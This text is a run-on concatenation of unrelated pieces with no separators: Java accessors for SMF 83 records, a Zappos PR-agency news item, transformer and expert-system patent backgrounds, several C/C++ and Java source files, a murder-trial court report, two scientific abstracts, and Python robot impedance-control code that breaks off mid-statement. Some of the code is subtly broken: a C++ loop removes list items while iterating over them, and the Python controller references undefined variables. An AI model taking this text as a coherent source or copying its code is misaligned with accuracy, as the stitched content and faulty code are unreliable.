public void setSmf83dte(int smf83dte) { if (SMF83DTE.equals(this.smf83dte, smf83dte)) return; SMF83DTE.putInt(smf83dte, bytes); this.smf83dte = new Integer(smf83dte); } public String getSmf83sid() { if (smf83sid == null) { smf83sid = SMF83SID.getString(bytes); } return smf83sid; } public void setSmf83sid(String smf83sid) { if (SMF83SID.equals(this.smf83sid, smf83sid)) return; SMF83SID.putString(smf83sid, bytes); this.smf83sid = smf83sid; } public byte[] getSmf83df1() { if (smf83df1 == null) { smf83df1 = SMF83DF1.getByteArray(bytes); } return smf83df1; } public void setSmf83df1(byte[] smf83df1) { if (SMF83DF1.equals(this.smf83df1, smf83df1)) return; SMF83DF1.putByteArray(smf83df1, bytes); this.smf83df1 = smf83df1; } public String getSmf83ssi() { if (smf83ssi == null) { smf83ssi = SMF83SSI.getString(bytes); } return smf83ssi; } public void setSmf83ssi(String smf83ssi) { if (SMF83SSI.equals(this.smf83ssi, smf83ssi)) return; SMF83SSI.putString(smf83ssi, bytes); this.smf83ssi = smf83ssi; } public int getSmf83typ() { if (smf83typ == null) { smf83typ = new Integer(SMF83TYP.getInt(bytes)); } return smf83typ.intValue(); } public void setSmf83typ(int smf83typ) { if (SMF83TYP.equals(this.smf83typ, smf83typ)) return; SMF83TYP.putInt(smf83typ, bytes); this.smf83typ = new Integer(smf83typ); } public byte[] getSmf83sds() { if (smf83sds == null) { smf83sds = SMF83SDS.getByteArray(bytes); } return smf83sds; } public void setSmf83sds(byte[] smf83sds) { if (SMF83SDS.equals(this.smf83sds, smf83sds)) return; SMF83SDS.putByteArray(smf83sds, bytes); this.smf83sds = smf83sds; } public int getSmf83trp() { if (smf83trp == null) { smf83trp = new Integer(SMF83TRP.getInt(bytes)); } return smf83trp.intValue(); } public void setSmf83trp(int smf83trp) { if (SMF83TRP.equals(this.smf83trp, smf83trp)) return; SMF83TRP.putInt(smf83trp, bytes); this.smf83trp = new Integer(smf83trp); } public int getSmf83xxx() { if (smf83xxx == null) { smf83xxx = new Integer(SMF83XXX.getInt(bytes)); } return smf83xxx.intValue(); } public void setSmf83xxx(int smf83xxx) { if (SMF83XXX.equals(this.smf83xxx, smf83xxx)) return; SMF83XXX.putInt(smf83xxx, bytes); this.smf83xxx = new Integer(smf83xxx); } public long getSmf83opd() { if (smf83opd == null) { smf83opd = new Long(SMF83OPD.getLong(bytes)); } return smf83opd.longValue(); } public void setSmf83opd(long smf83opd) { if (SMF83OPD.equals(this.smf83opd, smf83opd)) return; SMF83OPD.putLong(smf83opd, bytes); this.smf83opd = new Long(smf83opd); } public int getSmf83lpd() { if (smf83lpd == null) { smf83lpd = new Integer(SMF83LPD.getInt(bytes)); } return smf83lpd.intValue(); } public void setSmf83lpd(int smf83lpd) { if (SMF83LPD.equals(this.smf83lpd, smf83lpd)) return; SMF83LPD.putInt(smf83lpd, bytes); this.smf83lpd = new Integer(smf83lpd); } public int getSmf83npd() { if (smf83npd == null) { smf83npd = new Integer(SMF83NPD.getInt(bytes)); } return smf83npd.intValue(); } public void setSmf83npd(int smf83npd) { if (SMF83NPD.equals(this.smf83npd, smf83npd)) return; SMF83NPD.putInt(smf83npd, bytes); this.smf83npd = new Integer(smf83npd); } public long getSmf83od1() { if (smf83od1 == null) { smf83od1 = new Long(SMF83OD1.getLong(bytes)); } return smf83od1.longValue(); } public void setSmf83od1(long smf83od1) { if (SMF83OD1.equals(this.smf83od1, smf83od1)) return; SMF83OD1.putLong(smf83od1, bytes); this.smf83od1 = new Long(smf83od1); } public int getSmf83ld1() { if (smf83ld1 == null) { smf83ld1 = new Integer(SMF83LD1.getInt(bytes)); } return smf83ld1.intValue(); } public void setSmf83ld1(int smf83ld1) { if (SMF83LD1.equals(this.smf83ld1, smf83ld1)) return; SMF83LD1.putInt(smf83ld1, bytes); this.smf83ld1 = new Integer(smf83ld1); } public int getSmf83nd1() { if (smf83nd1 == null) { smf83nd1 = new Integer(SMF83ND1.getInt(bytes)); } return smf83nd1.intValue(); } public void setSmf83nd1(int smf83nd1) { if (SMF83ND1.equals(this.smf83nd1, smf83nd1)) return; SMF83ND1.putInt(smf83nd1, bytes); this.smf83nd1 = new Integer(smf83nd1); } public long getSmf83od2() { if (smf83od2 == null) { smf83od2 = new Long(SMF83OD2.getLong(bytes)); } return smf83od2.longValue(); } public void setSmf83od2(long smf83od2) { if (SMF83OD2.equals(this.smf83od2, smf83od2)) return; SMF83OD2.putLong(smf83od2, bytes); this.smf83od2 = new Long(smf83od2); } public int getSmf83ld2() { if (smf83ld2 == null) { smf83ld2 = new Integer(SMF83LD2.getInt(bytes)); } return smf83ld2.intValue(); } public void setSmf83ld2(int smf83ld2) { if (SMF83LD2.equals(this.smf83ld2, smf83ld2)) return; SMF83LD2.putInt(smf83ld2, bytes); this.smf83ld2 = new Integer(smf83ld2); } public int getSmf83nd2() { if (smf83nd2 == null) { smf83nd2 = new Integer(SMF83ND2.getInt(bytes)); } return smf83nd2.intValue(); } public void setSmf83nd2(int smf83nd2) { if (SMF83ND2.equals(this.smf83nd2, smf83nd2)) return; SMF83ND2.putInt(smf83nd2, bytes); this.smf83nd2 = new Integer(smf83nd2); } }
Online shoe and apparel retailer Zappos has expanded the duties of Mullen, its creative and media buying firm since 2009, to cover PR. It previously worked with Kel & Partners. LAS VEGAS: Online shoe and apparel retailer Zappos has selected Mullen’s PR unit to serve as its communications AOR following a competitive review. The firm has worked with Zappos on advertising and media buying since 2009. Mullen’s PR team consists of 35 staffers, who also work on experiential and social media efforts, said Kelly Burke, SVP and group account director at Mullen. Catherine Cook, PR manager at Zappos, said the Mullen team "is bringing a wealth of knowledge to Zappos.com in the fashion, influencer, and experiential spaces, and their passion and enthusiasm for the brand is unparalleled." She added in an emailed statement that Mullen’s team "embodies the spirit and core values of Zappos." Prior to bringing on Mullen, Zappos worked with Kel & Partners, which served as the brand’s AOR since 2008. Representatives from Kel & Partners did not respond to inquiries seeking comment. Mullen, which was hired earlier this month, is working on the "four Cs" for Zappos: clothing, community, customer service, and culture, explained Burke. For the clothing-focused part of the account, the agency, with a core team of six staffers on the business, will focus on increasing awareness of the breadth and depth of Zappos’ product offerings. The firm will work to engage traditional media outlets, as well as the "big hitters in fashion," said Burke. In addition to winning the PR account in March, Mullen was tasked with handling experiential projects for the brand in recent months, such as a carousel baggage claim game the day before Thanksgiving of last year at Houston’s George Bush Intercontinental Airport. Burke said the firm hopes to continue growing that part of the account. Budget information for the business was not disclosed. Burke noted that communications, which is the "unsung hero of Mullen to a certain degree," has long been a practice at the firm. Other PR clients include real-estate company Century 21, Olympus, Capital One, JetBlue, and MassMutual. Zappos issued an RFP for its PR account in May 2012, only to pull it four months later and stick with Kel & Partners instead. Before canceling the review, Zappos looked for a full-service agency to position it as a "one-stop-shop online retailer that offers a range of products from footwear to handbags."
This invention relates to transformers and more particularly to transformers having a dry-type construction with solid insulation. A transformer with a dry-type construction includes at least one coil mounted to a core so as to form a core/coil assembly. The core is ferromagnetic and is often comprised of a stack of metal plates or laminations composed of grain-oriented silicon steel. The core/coil assembly is encapsulated in a solid insulating material to insulate and seal the core/coil assembly from the outside environment. The solid insulating material that is used to encapsulate the core/coil assembly of a dry-type transformer is typically a thermoset polymer, which is a polymer material that cures, through the addition of energy, to a stronger form. The energy may be in the form of heat (generally above 200 degrees Celsius), through a chemical reaction, or irradiation. A thermoset resin is usually liquid or malleable prior to curing, which permits the resin to be molded. When a thermoset resin cures, molecules in the resin cross-link, which causes the resin to harden. After curing, a thermoset resin cannot be remelted or remolded, without destroying its original characteristics. Thermoset resins include epoxies, melamines, phenolics and ureas. When a thermoset resin cures, the resin typically shrinks. Because the resin surrounds the core/coil assembly, the shrinking thermoset resin exerts high mechanical stresses and strains on the core of the transformer. These stresses and strains distort the oriented grains of the core and increase resistance to the magnetic flux flow in the laminations. This distortion and increased resistance results in higher core loss which causes the sensitivity of the transformer to decrease and diminishes the accuracy of the transformer. In addition, when the thermoset resin shrinks around edges and protrusions, cracks may form in the thermoset resin. The cracks may grow over time and compromise the insulating properties of the thermoset resin. As a result, partial discharges may occur. A partial discharge is an electrical spark that bridges the thermoset resin between portions of the core/coil assembly. A partial discharge doesn't necessarily occur at the core/coil assembly, it can occur anywhere the electric field strength exceeds the breakdown strength of the thermoset resin. Partial discharges contribute to the deterioration of the thermoset resin, which shortens the useful life of the transformer. One approach for protecting the core of a transformer and preventing partial discharges has been disclosed in U.S. patent application Ser. No. 11/518,682, filed on Sep. 11, 2006, entitled “DRY-TYPE TRANSFORMER WITH SHIELDED CORE/COIL ASSEMBLY AND METHOD OF MANUFACTURING THE SAME”, which is assigned to the assignee of the present invention, ABB Technology AG, and which is incorporated herein by reference. In the '682 patent application, a core and coil assembly of a transformer are disposed inside a protective polymer case having an exterior surface that is at least partially covered with a conductive coating. The present invention is directed toward such a protective polymer case having an improved construction.
/* * Copyright 2011, <NAME>, <EMAIL>. * Distributed under the terms of the MIT License. */ #ifndef NAME_INDEX_H #define NAME_INDEX_H #include "Index.h" #include "NodeListener.h" template<typename Policy> class GenericIndexIterator; class NameIndex : public Index, private NodeListener { public: NameIndex(); virtual ~NameIndex(); status_t Init(Volume* volume); virtual int32 CountEntries() const; private: virtual void NodeAdded(Node* node); virtual void NodeRemoved(Node* node); virtual void NodeChanged(Node* node, uint32 statFields, const OldNodeAttributes& oldAttributes); protected: virtual AbstractIndexIterator* InternalGetIterator(); virtual AbstractIndexIterator* InternalFind(const void* key, size_t length); private: class EntryTree; struct IteratorPolicy; struct Iterator; friend class IteratorPolicy; void _UpdateLiveQueries(Node* entry, const char* oldName, const char* newName); private: EntryTree* fEntries; }; #endif // NAME_INDEX_H
1.Technical Field The present invention relates generally to computer systems, and more specifically to a debugger suitable for use with rule-based expert systems. 2. Description of the Related Art Expert systems are computer programs which attempt to mimic expert problem-solving behavior. They are typically used to draw conclusions from a set of observations or to propose and confirm hypotheses in order to achieve a desired goal. These systems employ rules as their basic components and manipulate the rules using a control procedure, such as forward-chaining or backward-chaining, in order to solve a particular problem. Rules are statements of the form "IF condition, THEN action, ELSE action." The condition states one or more facts that must be true for the rule to be applied. The action parts state which actions should be taken when the rule is true or false. Actions for the true and false cases are found in the THEN and ELSE parts, respectively. The condition and actions frequently refer to variables which temporarily store information about the state of the problem solution. Thus, the action in one rule might assign a value to a variable which is used in the condition or action of another rule. While each rule is considered an independent unit and is entered and processed in a declarative manner, the sharing of variables between rules allows them to interact. In forward-chaining systems, the effects of rule firings are propagated by repeatedly checking to see if rule conditions are true. A set of initial variable values is matched against the rule conditions. As rule conditions become true, the appropriate rule actions are executed and the resulting variable values are matched. This match-execution cycle is repeated until certain stopping conditions are met or until no rule actions can be executed. In backward-chaining systems, the rules are used to establish values for goal variables. A set of variables are initially established as goals. Rules whose actions assign values to these variables are viewed as sources. The conditions of these rules may contain variables. If these variables have values, the rules may be evaluated to obtain values for the goals. If these variables do not have values, they are established as subgoals and additional rules are used as sources. This procedure continues until conditions can be evaluated and the effects of the rule actions ripple back through the chain of source rules, eventually assigning values to the original goal variables. Many inference engines allow non-rule sources to be used. Frequently, function calls, database accesses, or user queries may be used to acquire a value for a variable. However, these sources don't contribute to the propagation of values in forward-chaining or to the pursuit of goals and subgoals in backward-chaining. Thus, the use of such sources to supply values for variables does not affect the interactions of rules in an expert system. The fact that the rules may be entered in a declarative fashion and then executed in a manner which depends on the nature of the problem and data in a knowledge base means that the expert system programmer does not normally need to specify procedural interactions among rules. However, when the system does not display the desired behavior, it is often very difficult to determine exactly where the execution went awry. In typical expert systems, explanation facilities are provided in order to let the user view a trace of the steps which the expert system used to arrive at its conclusion. However, these explanations do not suffice to easily identify the problem in many cases, and are generally available only when the system needs the user to supply values or after the program has completed execution. Intermediate results of execution activities are frequently unavailable. Typical prior art expert system debuggers include Knowledge Tool, a product available from IBM, and TEIRESIAS. Knowledge Tool uses forward-chaining and allows a user to single step through the inferencing process. The debugger halts at the end of the match-execution cycle and presents limited state information. Some static information is available before and after system execution. TEIRESIAS, described in detail in Part 2 of KNOWLEDGE-BASED SYSTEMS IN ARTIFICIAL INTELLIGENCE, R. Davis and D. Lenat, McGraw-Hill, 1982, applies to backward-chaining systems. Limited state information can be obtained when execution halts while awaiting input of a variable value from a user. If a variable is changed, execution is restarted from the beginning. Similar problems exist in conventional, procedural programming environments. Since the programs are written as explicit procedures, the flow of execution is generally obvious. However, the effects of variable values and intermediate results are not visible during execution. Conventional debuggers address this problem by allowing the user to specify breakpoints, which are points at which execution is halted and the user is allowed to investigate variable values and execution information. Neither of the expert system debuggers mentioned above allow breakpoints to be defined based upon various conditions, such as variable values and rule firings, which occur during execution of an expert system. Neither is suitable for use with both forward-chaining and backward-chaining inference engines. Both utilize only a few simple debugging techniques typically found in conventional debuggers. Since the flow of execution in a declarative, rule-based expert system is not generally known in advance, and may not even be deterministic, the approaches used in conventional debuggers are not adequate for use with expert system programs. It would be desirable for a debugger suitable for use with rule-based expert systems to provide breakpoint and user information facilities which clarify the operation of such expert systems and simplify the user's task of correcting programming errors. It would be further desirable to provide a method for an expert system debugger to perform a consistency check whenever a rule or variable is changed by a user.
<reponame>Jacudibu/AwkwardEngine<filename>Awkward Engine/Code/Engine/GameObject.cpp<gh_stars>0 #include <typeinfo> #include "GameObject.h" GameObject::GameObject() { transform = new Transform(this); } GameObject::~GameObject() { delete(transform); for (Component* comp : components) { delete comp; } } void GameObject::addComponent(Component* comp) { if (comp == nullptr) return; // Check wether the component's Type is set up #ifdef _DEBUG if (comp->getID() == "") printf("WARNING: Added Component without ID to GameObject! GetComponent won't work now!"); #endif // If the Component was attached to another GameObject before, remove it. if (comp->gameObject != nullptr) comp->gameObject->removeComponent(comp); comp->gameObject = this; components.push_back(comp); } void GameObject::removeComponent(Component* comp) { if (comp == nullptr) return; components.remove(comp); comp->gameObject = nullptr; } void GameObject::removeAllComponents() { for (Component* comp : components) { components.remove(comp); delete comp; } } void GameObject::Update() { if (!enabled) return; for (Component* comp : components) { comp->Update(); } } Component* GameObject::getComponent(std::string ID) { for (Component* comp : components) { if (componentHash(comp->getID()) == componentHash(ID)) return comp; } return nullptr; } std::vector<Component*> GameObject::getComponents(std::string ID) { std::vector<Component*> result; for (Component* comp : components) { if (comp->getID().compare(ID) == 0) result.push_back(comp); } return result; } std::vector<Component*> GameObject::getComponentsInChildren(std::string ID) { std::vector<Component*> result; for (Transform* trans : transform->GetChildren()) { std::vector<Component*> tempVector = trans->getGameObject()->getComponents(ID); result.insert(result.end(), tempVector.begin(), tempVector.end()); } return result; }
/** * @brief Function to Poll message que. * */ int iface_process_ipc_msgs(void) { int ret = 0; int n, rv; fd_set readfds; struct timeval tv; FD_ZERO(&readfds); FD_SET(my_sock.sock_fd, &readfds); n = my_sock.sock_fd + 1; #ifdef NGCORE_SHRINK tv.tv_sec = 1; tv.tv_usec = 500000; #else tv.tv_sec = 10; tv.tv_usec = 500000; #endif rv = select(n, &readfds, NULL, NULL, &tv); if (rv == -1) { perror("select"); } else if (rv > 0) { if (FD_ISSET(my_sock.sock_fd, &readfds)) ret = iface_remove_que(COMM_SOCKET); } return ret; }
The body of an 88-year-old woman allegedly murdered by a hospital nurse was exhumed more than a year after her death, a court has heard. Doctors at first diagnosed a stroke in the case of Bridget Bourke, of Leeds, Newcastle Crown Court heard. Colin Norris, of Egilsay Terrace, Glasgow, is charged with murdering four elderly patients, including Mrs Bourke, at two Leeds hospitals. Mr Norris denies the offences, which allegedly occured in 2002. He has also pleaded not guilty to the attempted murder of the same four women and the attempted murder of 90-year-old Vera Wilby in the same year. The court heard on Wednesday how police investigating the death of Ethel Hall, 86, from Calverley in Leeds in December 2002, decided to review the cases of Mrs Bourke; Doris Ludlam, 80, from Pudsey, and Irene Crookes, 79, from Leeds. All three women had died earlier that year. The jury heard the women's bodies contained large amounts of insulin which caused them to slip into comas from which they could not be revived. Robert Smith QC, prosecuting, said: "Mrs Bourke, unlike Doris Ludlam and Irene Crookes, had been buried, not cremated. "Following the investigation into the death of Ethel Hall, an order was obtained from the coroner for the exhumation of Mrs Bourke's body." Mr Smith said that although Mrs Bourke had been a "frail and sick" woman, and had well-established diseases, tests carried out by two experts following the exhumation found she did not die from her original illnesses. Following the exhumation in September 2003, a pathologist redefined her cause of death as an insulin-induced coma, he told the jury. The prosecutor said that when another of Mr Norris' alleged victims, Mrs Crookes, was found slumped in bed, a member of staff noticed in the nurse, Mr Norris, "an attitude of detached amusement". The medical practitioner said Mr Norris showed no urgency in trying to help revive her, Mr Smith told the court.
<filename>pax-web-extender-war/src/main/java/org/ops4j/pax/web/extender/war/internal/tracker/ReplaceableService.java /* * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or * implied. * * See the License for the specific language governing permissions and * limitations under the License. */ package org.ops4j.pax.web.extender.war.internal.tracker; import java.util.ArrayList; import java.util.Collections; import java.util.List; import org.osgi.framework.BundleContext; import org.osgi.framework.ServiceReference; import org.osgi.util.tracker.ServiceTracker; import org.osgi.util.tracker.ServiceTrackerCustomizer; import org.slf4j.Logger; import org.slf4j.LoggerFactory; /** */ public class ReplaceableService<T> { /** * Logger. */ private static final Logger LOG = LoggerFactory.getLogger(ReplaceableService.class); /** * Bundle context. Constructor parameter. Cannot be null. */ private final BundleContext bundleContext; /** * Service class. Constructor parameter. Cannot be null. */ @SuppressWarnings("unused") private final Class<T> serviceClass; /** * Listener for backing service related events. Constructor paramater. Can be null. */ private final ReplaceableServiceListener<T> serviceListener; /** * Service tracker. Cannot be null. */ private final ServiceTracker<T, T> serviceTracker; private final List<ServiceReference<T>> boundReferences; private T service; public ReplaceableService(BundleContext context, Class<T> serviceClass, ReplaceableServiceListener<T> serviceListener) { this.bundleContext = context; this.serviceClass = serviceClass; this.serviceListener = serviceListener; this.serviceTracker = new ServiceTracker<>(context, serviceClass, new Customizer()); this.boundReferences = new ArrayList<>(); } public void start() { this.serviceTracker.open(); } public void stop() { this.serviceTracker.close(); } protected void bind(T serviceToBind) { if (serviceListener != null) { T oldService; synchronized (this) { oldService = service; service = serviceToBind; } serviceListener.serviceChanged(oldService, serviceToBind); } } private class Customizer implements ServiceTrackerCustomizer<T, T> { @Override public T addingService(ServiceReference<T> reference) { T bundleService = bundleContext.getService(reference); ServiceReference<T> bind; synchronized (boundReferences) { boundReferences.add(reference); Collections.sort(boundReferences); bind = boundReferences.get(0); } if (bind == reference) { bind(bundleService); } else { bind(serviceTracker.getService(bind)); } return bundleService; } @Override public void modifiedService(ServiceReference<T> reference, T modifiedService) { } @Override public void removedService(ServiceReference<T> reference, T removedService) { ServiceReference<T> bind; synchronized (boundReferences) { boundReferences.remove(reference); if (boundReferences.isEmpty()) { bind = null; } else { bind = boundReferences.get(0); } } if (bind == null) { bind(null); } else { bind(serviceTracker.getService(bind)); } bundleContext.ungetService(reference); } } }
Microstructures and electrical properties of TiO-doped AlO ceramics. Microstructures of TiO-doped alpha-AlO ceramics used as electrostatic chucks (ESC) were investigated by transmission electron microscopy including energy-dispersive spectrometry (EDS) and electron energy loss spectroscopy (EELS) analyses in connection with their electrical properties. The lattice parameters of sintered AlO grains are almost independent of TiO content as well as the sintering temperature, indicating immiscibility of the additive with AlO. Scanning transmission electron microscopy (STEM)-EDS revealed that the grain boundaries of alpha-AlO are slightly enriched with Ti. It was shown in EELS that the segregated Ti is in a partially reduced state. The Ti-enriched grain boundaries, therefore, play a role as a conductive network, which is responsible for considerable improvement of electronic conductivity with TiO doping. STEM-EDS and electron diffraction analyses confirmed that micrometre-sized TiO particles are dispersed in the alpha-AlO when sintering is operated at 1300 degrees C or lower, while the particles transform into AlTiO at higher temperature. EELS revealed that the TiO grains are partially reduced into non-stoichiometric TiO(2-y), while AlTiO grains are in the fully oxidized state. The TiO(2-y)-dispersed alpha-AlO shows no dielectric relaxation and quite smooth dissipation of the electrostatic condensed charges. In contrast, alpha-AlO with AlTiO grains possesses pronounced dielectric relaxation, and the electrostatic dissipation takes such a longer time as 30 s. The former is preferable to application to ESC in terms of quick response.
Joint estimation of binaural distance and azimuth by exploiting deep neural networks. The state-of-the-art supervised binaural distance estimation methods often use binaural features that are related to both the distance and the azimuth, and thus the distance estimation accuracy may degrade a great deal with fluctuant azimuth. To incorporate the azimuth on estimating the distance, this paper proposes a supervised method to jointly estimate the azimuth and the distance of binaural signals based on deep neural networks (DNNs). In this method, the subband binaural features, including many statistical properties of several subband binaural features and the binaural spectral magnitude difference standard deviation, are extracted together as cues to jointly estimate the azimuth and the distance using binaural signals by exploiting a multi-objective DNN framework. Especially, both the azimuth and the distance cues are utilized in the learning stage of the error back-propagation in the multi-objective DNN framework, which can improve the generalization ability of the azimuth and the distance estimation. Experimental results demonstrate that the proposed method can not only achieve high azimuth estimation accuracy but can also effectively improve the distance estimation accuracy when compared with several state-of-the-art supervised binaural distance estimation methods.
<reponame>jarieloc/robotic-framework<filename>scripts/simulation.py from robot3 import * import matplotlib as mpl import matplotlib.pyplot as plt import numpy as np import quaternion import scipy mpl.style.use('seaborn') class stateVector: def __init__(self): self.x = np.zeros(6) self.xd = np.zeros(6) self.xdd = np.zeros(6) self.quat = np.quaternion(1,0,0,0) self.quat_d = np.quaternion(1,0,0,0) self.quat_dd = np.quaternion(1,0,0,0) self.x3 = self.x[:3] self.xd3 = self.x[:3] self.xdd3 = self.x[:3] class jointStateVector: def __init__(self, q, qd, qdd): self.q = q self.qd = qd self.qdd = qdd self.qnull = self.q self.qdnull = self.qd self.qddnull = self.qdd class dataCollect: def __init__(self, sampcol): self.x = np.zeros((6,sampcol)) self.xd = np.zeros((6,sampcol)) self.q = np.zeros([7,1]) self.qd = np.zeros([7,1]) self.qdd = np.zeros([7,1]) self.aq = np.zeros((7,sampcol)) self.error = np.zeros((6,sampcol)) self.imp = np.zeros((6,sampcol)) self.F = np.zeros((7,sampcol)) self.tau = np.zeros((7,sampcol)) class simulation: def __init__(self, state_des, state_end, jointState, error, data): self.state_des = state_des self.state_end = state_end self.jointState = jointState self.error = error self.data = data self.Bn = np.zeros((7,7)) self.Kn = np.zeros((7,7)) def spong_impedance_control(self, impctrl, rb): # Double integrator impedance control strategy kine = rb.forwardKinematics(self.jointState.q) rot = kine.R # rot2 = quaternion.from_rotation_matrix(self.state_des.quat) # R_e = block_diag(rot, rot) # xdd_in = np.dot(R_e.T, self.state_des.xdd) # E = rb.quatprop_E(self.error.quat) Ko = rot.dot(impctrl.Kd[3:, 3:]) Kd_b = block_diag(impctrl.Kd[:3,:3], Ko) # Kd_b = impctrl.Kd Bd = impctrl.damping_constant_mass() # impctrl.Kd[3:, 3:] = Ko # impctrl.Bd = impctrl.damping_constant_mass() # Kd_b = impctrl.Kd ax = impctrl.outputquat(Kd_b, Bd, self.error.x, self.error.xd, self.state_des.xdd, impctrl.F) # self.data.imp[:3,i] = ax aq_in = rb.calcQddNull(ax, self.jointState.q, self.jointState.qd, self.jointState.qddnull) # Inverse dynamics tauc = rb.inverseDynamics(self.jointState.q, self.jointState.qd, aq_in, rb.grav) # Computing Jacobian for external forces: J = rb.calcJac(self.jointState.q) Jpinv = rb.pinv(J) # Nullspace torque (projection matrix * torque_0) tau_nullspace = np.dot((np.eye(7) - np.dot(J.T, Jpinv.T) ), (np.dot( impctrl.nullspace_stiffness_, (self.jointState.qnull - self.jointState.q)) - np.dot(np.dot(2, np.sqrt(impctrl.nullspace_stiffness_)), self.jointState.qd))) # q_null update self.jointState.q_null = self.jointState.q # Torque collected tau = tauc + tau_nullspace return tau def classical_impedance_control(self, impctrl, rb, ndof, *args): # Frame Selection kine = rb.forwardKinematics(self.jointState.q) rot = kine.R R_e = block_diag(rot, rot) # Frame variables vd_error = rb.calcVd(self.jointState.q, self.jointState.qd, self.state_des.xd) xdd_in = R_e.dot(self.state_des.xdd) xd_end = R_e.dot(self.state_end.xd) if args: rb.ndof = 7 if args[0].lower() in ['rpy']: J = rb.calcJac(qin) Ja = rb.analyticJacobian(J, self.state_end.x[3:], 'rpy') # Fix for jacobian dot later if args[0].lower() in ['quaternion']: J = rb.calcJac(self.jointState.q) Jd = rb.calcJacDot(self.jointState.q, self.jointState.qd) # Ja = J Ja = R_e.dot(J) Jad = R_e.dot(Jd) # Ja = rb.analyticJacobian(J, self.state_end.quat, 'quaternion6') # Jad = rb.analyticJacobianDot(J, Jd, self.state_end.quat, self.state_end.quat_d) # Cartesian Inertia Matrix # M = rb.inertiaComp(self.jointState.q) Lambda = rb.cinertiaComp(self.jointState.q, Ja) # print Lambda.shape # Cartesian Coriolis Matrix mu = rb.ccoriolisComp(self.jointState.q, self.jointState.qd, Ja, Jad) # For the classical impedance controller without redundancy if ndof is 6: qin = np.zeros(6) qdin = np.zeros(6) qin[0] = self.jointState.q[0] qin[1] = self.jointState.q[2] qin[2] = self.jointState.q[3] qin[3] = self.jointState.q[4] qin[4] = self.jointState.q[5] qin[5] = self.jointState.q[6] qdin[0] = self.jointState.qd[0] qdin[1] = self.jointState.qd[2] qdin[2] = self.jointState.qd[3] qdin[3] = self.jointState.qd[4] qdin[4] = self.jointState.qd[5] qdin[5] = self.jointState.qd[6] Ja = np.delete(Ja, 1, 1) Jad = np.delete(Jad, 1, 1) # Lambda = np.delete(Lambda, 1, 1) # mu = np.delete(Lambda,1,1) # rb.ndof = 6 # else: # qin = self.jointState.q # qdin = self.jointState.qd rb.ndof = 7 # Jointspace Coriolis Matrix # C = rb.coriolisComp(self.jointState.q, self.jointState.qd) # Jointspace gravitational load vector tg = rb.gravloadComp(self.jointState.q, rb.grav) # Computing Jacobian: # Jnull = rb.calcJac(self.jointState.q) Jpinv = rb.pinv(Ja) # Computing dynamic damping E = rb.quatprop_E(self.error.quat) Ko = 2 * E.T.dot( rot.dot( impctrl.Kd[3:, 3:]) ) Bd = impctrl.Bd # Bd = impctrl.damping_constant_mass() # impctrl.Kd[3:, 3:] = Ko # u, s, vh = np.linalg.svd(M.T, full_matrices=True) # u.shape, s.shape, vh.shape # rho = 0.2 # S2 = np.dot(M.T,0) # for i in range(len(s)): # S2[i,i] = s[i] / (s[i]**2 + rho**2) # MpinvT = np.dot(np.dot(vh.T,S2.T),u.T) # MpinvT = MpinvT.T # impctrl.zeta = np.array([1, 1, 1, 1, 1, 1]) # # # Dual eigen: # Bd, Kd_b3 = impctrl.damping_dual_eigen(impctrl.Kd,impctrl.Md) # Test # Kd_b = impctrl.Kd # Quaternion stiffness and translational stiffness Kd_b = block_diag(impctrl.Kd[:3,:3], Ko) # Compute torque "cartesian" # tauc = (np.dot(Ja.T, ( Lambda.dot(self.state_des.xdd) + mu.dot(self.state_end.xd))) - # np.dot(Ja.T, np.dot(np.dot(Lambda, np.linalg.inv(impctrl.Md)), # (np.dot(Kd_b, self.error.x) + np.dot(Bd, self.error.xd))) # )) # tauc = (np.dot(Ja.T, ( Lambda.dot(xdd_in) + mu.dot(xd_end) )) - np.dot(Ja.T, np.dot(np.dot(Lambda, np.linalg.inv(impctrl.Md)), (np.dot(Kd_b, self.error.x) + np.dot(Bd, vd_error)))) + np.dot( Ja.T.dot( Lambda.dot( np.linalg.inv(impctrl.Md) ) - np.eye(6)), impctrl.F)) # Append to torque if ndof 6 sim if ndof is 6: # At the beginning tauc = np.array([tauc[0], 0,tauc[1],tauc[2],tauc[3],tauc[4],tauc[5]]) # Dual eigen: # ns = impctrl.nullspace_stiffness_ # K_n = np.diag(np.array([ns,ns,ns,ns,ns,ns,ns])) # B_n, Kd_b2 = impctrl.damping_dual_eigen2(K_n,M) # Compute torque nullspace # tau_nullspace = np.dot((np.eye(7) - np.dot(Jnull.T, Jpinv.T) ), # (np.dot( K_n, (self.jointState.qnull - self.jointState.q)) - # np.dot(B_n, self.jointState.qd))) # Jpinv2 = np.dot(Lambda,J.dot(MpinvT)) tau_nullspace = np.dot((np.eye(7) - np.dot(Ja.T, Jpinv.T) ), (np.dot( self.Kn, (self.jointState.qnull - self.jointState.q)) - np.dot(self.Bn, self.jointState.qd))) # tau = tauc + tau_nullspace + tg + np.dot(C, self.jointState.qd) tau = tauc + tau_nullspace + tg return tau def inertia_avoidance_impedance_control(self, impctrl, rb, ndof, *args): # For the classical impedance controller without redundancy if ndof is 6: qin = self.jointState.q[:6] qdin = self.jointState.qd[:6] rb.ndof = 6 else: qin = self.jointState.q qdin = self.jointState.qd # Computing analytical Jacobian if args: if args[0].lower() in ['rpy']: J = rb.calcJac(qin) Ja = rb.analyticJacobian(J, self.state_end.x[3:], 'rpy') if args[0].lower() in ['quaternion']: J = rb.calcJac(qin) Ja = rb.analyticJacobian(J, self.state_end.quat, 'quaternion6') # Cartesian Inertia Matrix M = rb.inertiaComp(qin) Lambda = rb.cinertiaComp(qin, Ja) # Cartesian Coriolis Matrix mu = rb.ccoriolisComp(qin, qdin, Ja, Jad) # Reset DoF rb.ndof = 7 # Cartesian Coriolis Matrix # C = rb.coriolisComp(self.jointState.q, self.jointState.qd) # Jointspace gravitational load vector tg = rb.gravloadComp(self.jointState.q, rb.grav) # Computing Jacobian: Jnull = rb.calcJac(self.jointState.q) Jpinv = rb.pinv(Jnull) # Computing dynamic damping impctrl.zeta = np.array([1, 1, 1, 1, 1, 1]) # Dual eigen: Bd, Kd_b = impctrl.damping_dual_eigen(impctrl.Kd,Lambda) # Test Kd_b = impctrl.Kd # Compute torque "cartesian" tauc = tg + np.dot(Ja.T, ( np.dot(Lambda, self.state_des.xdd) + mu.dot(self.state_des.xd) - np.dot(Kd_B, self.error.x) - np.dot(Bd, self.error.xd) )) # Append to torque if ndof 6 sim if ndof is 6: # At the beginning tauc = 